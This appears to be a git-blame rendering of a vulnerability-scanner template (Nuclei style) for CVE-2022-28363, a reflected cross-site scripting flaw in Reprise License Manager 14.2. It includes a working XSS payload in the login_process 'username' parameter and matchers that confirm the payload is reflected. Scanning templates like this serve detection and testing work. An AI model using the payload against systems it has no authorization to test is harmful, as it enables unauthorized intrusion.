2022-04-10 07:11:31 +00:00
id : CVE-2022-28363
info :
name : Reprise License Manager 14.2 - Reflected Cross-Site Scripting
author : Akincibor
severity : medium
description : |
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-28363
- https://www.reprisesoftware.com/products/software-license-management.php
- https://github.com/advisories/GHSA-rpvc-qgrm-r54f
- http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html
2022-04-18 13:10:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-04-18 13:10:41 +00:00
cve-id : CVE-2022-28363
cwe-id : CWE-79
2022-04-18 14:00:15 +00:00
tags : cve,cve2022,xss,rlm
2022-04-10 07:11:31 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
words :
- '<svg/onload=alert(document.domain)>'
- 'Login Failed'
condition : and
- type : word
part : header
words :
- "text/html"